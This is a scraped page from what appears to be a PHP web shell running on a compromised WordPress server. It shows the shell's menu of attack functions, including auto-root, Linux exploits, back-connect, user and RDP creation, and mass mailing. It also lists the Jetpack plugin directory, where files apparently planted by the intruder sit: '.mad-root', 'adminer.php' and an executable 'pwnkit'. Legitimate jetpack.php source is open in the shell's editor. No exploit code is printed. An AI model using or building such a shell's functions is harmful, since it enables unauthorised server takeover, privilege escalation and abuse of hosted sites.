Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
sync
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
.svnignore
151
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
120.31
KB
-rw-r--r--
class.frame-nonce-preview.php
2.18
KB
-rw-r--r--
class.jetpack-admin.php
8.26
KB
-rw-r--r--
class.jetpack-autoupdate.php
6.79
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
2.94
KB
-rw-r--r--
class.jetpack-cli-call.php
25.22
KB
-rw-r--r--
class.jetpack-cli.php
20.53
KB
-rw-r--r--
class.jetpack-client-server.ph...
8.31
KB
-rw-r--r--
class.jetpack-client.php
10.3
KB
-rw-r--r--
class.jetpack-connection-banne...
24.73
KB
-rw-r--r--
class.jetpack-constants.php
2.35
KB
-rw-r--r--
class.jetpack-data.php
4.37
KB
-rw-r--r--
class.jetpack-debugger.php
19.68
KB
-rw-r--r--
class.jetpack-error.php
47
B
-rw-r--r--
class.jetpack-heartbeat.php
4.51
KB
-rw-r--r--
class.jetpack-idc.php
19.76
KB
-rw-r--r--
class.jetpack-ixr-client.php
3.2
KB
-rw-r--r--
class.jetpack-jitm.php
17.71
KB
-rw-r--r--
class.jetpack-modules-list-tab...
11.12
KB
-rw-r--r--
class.jetpack-network-first.ph...
546
B
-rw-r--r--
class.jetpack-network-sites-li...
4.26
KB
-rw-r--r--
class.jetpack-network.php
22.98
KB
-rw-r--r--
class.jetpack-options.php
10.72
KB
-rw-r--r--
class.jetpack-post-images.php
17.62
KB
-rw-r--r--
class.jetpack-signature.php
8.29
KB
-rw-r--r--
class.jetpack-tracks.php
2.87
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
8.84
KB
-rw-r--r--
class.jetpack-user-agent.php
45.94
KB
-rw-r--r--
class.jetpack-xmlrpc-server.ph...
16.02
KB
-rw-r--r--
class.jetpack.php
205.39
KB
-rw-r--r--
class.json-api-endpoints.php
60.81
KB
-rw-r--r--
class.json-api.php
19.27
KB
-rw-r--r--
class.photon.php
33.33
KB
-rw-r--r--
composer.json
345
B
-rw-r--r--
functions.compat.php
2.38
KB
-rw-r--r--
functions.gallery.php
2.26
KB
-rw-r--r--
functions.global.php
260
B
-rw-r--r--
functions.opengraph.php
15.48
KB
-rw-r--r--
functions.photon.php
8.49
KB
-rw-r--r--
jetpack.php
5.72
KB
-rw-r--r--
json-api-config.php
255
B
-rw-r--r--
json-endpoints.php
132.2
KB
-rw-r--r--
locales.php
59.55
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
15.87
KB
-rw-r--r--
require-lib.php
982
B
-rw-r--r--
rest-api.md
6.14
KB
-rw-r--r--
uninstall.php
830
B
-rw-r--r--
webpack.config.js
3.13
KB
-rw-r--r--
wpml-config.xml
213
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jetpack.php
<?php /* * Plugin Name: Jetpack by WordPress.com * Plugin URI: http://jetpack.com * Description: Bring the power of the WordPress.com cloud to your self-hosted WordPress. Jetpack enables you to connect your blog to a WordPress.com account to use the powerful features normally only available to WordPress.com users. * Author: Automattic * Version: 4.4.5 * Author URI: http://jetpack.com * License: GPL2+ * Text Domain: jetpack * Domain Path: /languages/ */ define( 'JETPACK__MINIMUM_WP_VERSION', '4.5' ); define( 'JETPACK__VERSION', '4.4.5' ); define( 'JETPACK_MASTER_USER', true ); define( 'JETPACK__API_VERSION', 1 ); define( 'JETPACK__PLUGIN_DIR', plugin_dir_path( __FILE__ ) ); define( 'JETPACK__PLUGIN_FILE', __FILE__ ); defined( 'JETPACK_CLIENT__AUTH_LOCATION' ) or define( 'JETPACK_CLIENT__AUTH_LOCATION', 'header' ); defined( 'JETPACK_CLIENT__HTTPS' ) or define( 'JETPACK_CLIENT__HTTPS', 'AUTO' ); defined( 'JETPACK__GLOTPRESS_LOCALES_PATH' ) or define( 'JETPACK__GLOTPRESS_LOCALES_PATH', JETPACK__PLUGIN_DIR . 'locales.php' ); defined( 'JETPACK__API_BASE' ) or define( 'JETPACK__API_BASE', 'https://jetpack.wordpress.com/jetpack.' ); defined( 'JETPACK_PROTECT__API_HOST' ) or define( 'JETPACK_PROTECT__API_HOST', 'https://api.bruteprotect.com/' ); defined( 'JETPACK__WPCOM_JSON_API_HOST' ) or define( 'JETPACK__WPCOM_JSON_API_HOST', 'public-api.wordpress.com' ); add_filter( 'rest_url_prefix', 'jetpack_index_permalinks_rest_api_url', 999 ); /** * Fix the REST API URL for sites using index permalinks * * @todo Remove when 4.7 is minimum version * @see https://core.trac.wordpress.org/ticket/38182 * @see https://github.com/Automattic/jetpack/issues/5216 * @author kraftbj * * @param string $prefix REST API endpoint URL base prefix. * * @return string */ function jetpack_index_permalinks_rest_api_url( $prefix ){ global $wp_rewrite, $wp_version; if ( version_compare( $wp_version, '4.7-alpha-38790', '<' ) && isset( $wp_rewrite ) && $wp_rewrite instanceof WP_Rewrite && method_exists( $wp_rewrite, 'using_index_permalinks' ) && $wp_rewrite->using_index_permalinks() ) { $prefix = $wp_rewrite->index . '/' . $prefix; } return $prefix; } /** * Returns the location of Jetpack's lib directory. This filter is applied * in require_lib(). * * @since 4.0.2 * * @return string Location of Jetpack library directory. * * @filter require_lib_dir */ function jetpack_require_lib_dir() { return JETPACK__PLUGIN_DIR . '_inc/lib'; } add_filter( 'jetpack_require_lib_dir', 'jetpack_require_lib_dir' ); // @todo: Abstract out the admin functions, and only include them if is_admin() require_once( JETPACK__PLUGIN_DIR . 'class.jetpack.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-network.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-client.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-data.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-client-server.php' ); require_once( JETPACK__PLUGIN_DIR . 'sync/class.jetpack-sync-actions.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-options.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-user-agent.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-post-images.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-error.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-heartbeat.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.photon.php' ); require_once( JETPACK__PLUGIN_DIR . 'functions.photon.php' ); require_once( JETPACK__PLUGIN_DIR . 'functions.global.php' ); require_once( JETPACK__PLUGIN_DIR . 'functions.compat.php' ); require_once( JETPACK__PLUGIN_DIR . 'functions.gallery.php' ); require_once( JETPACK__PLUGIN_DIR . 'require-lib.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-autoupdate.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-tracks.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.frame-nonce-preview.php' ); require_once( JETPACK__PLUGIN_DIR . 'modules/module-headings.php'); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-constants.php'); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-idc.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-connection-banner.php' ); if ( is_admin() ) { require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-admin.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-jitm.php' ); require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-debugger.php' ); } // Play nice with http://wp-cli.org/ if ( defined( 'WP_CLI' ) && WP_CLI ) { require_once( JETPACK__PLUGIN_DIR . 'class.jetpack-cli.php' ); } require_once( JETPACK__PLUGIN_DIR . '_inc/lib/class.core-rest-api-endpoints.php' ); register_activation_hook( __FILE__, array( 'Jetpack', 'plugin_activation' ) ); register_deactivation_hook( __FILE__, array( 'Jetpack', 'plugin_deactivation' ) ); add_action( 'updating_jetpack_version', array( 'Jetpack', 'do_version_bump' ), 10, 2 ); add_action( 'init', array( 'Jetpack', 'init' ) ); add_action( 'plugins_loaded', array( 'Jetpack', 'plugin_textdomain' ), 99 ); add_action( 'plugins_loaded', array( 'Jetpack', 'load_modules' ), 100 ); add_filter( 'jetpack_static_url', array( 'Jetpack', 'staticize_subdomain' ) ); add_filter( 'is_jetpack_site', '__return_true' ); /** * Add an easy way to photon-ize a URL that is safe to call even if Jetpack isn't active. * * See: http://jetpack.com/2013/07/11/photon-and-themes/ */ if ( Jetpack::is_module_active( 'photon' ) ) { add_filter( 'jetpack_photon_url', 'jetpack_photon_url', 10, 3 ); } require_once( JETPACK__PLUGIN_DIR . '3rd-party/3rd-party.php' ); Jetpack::init();
Close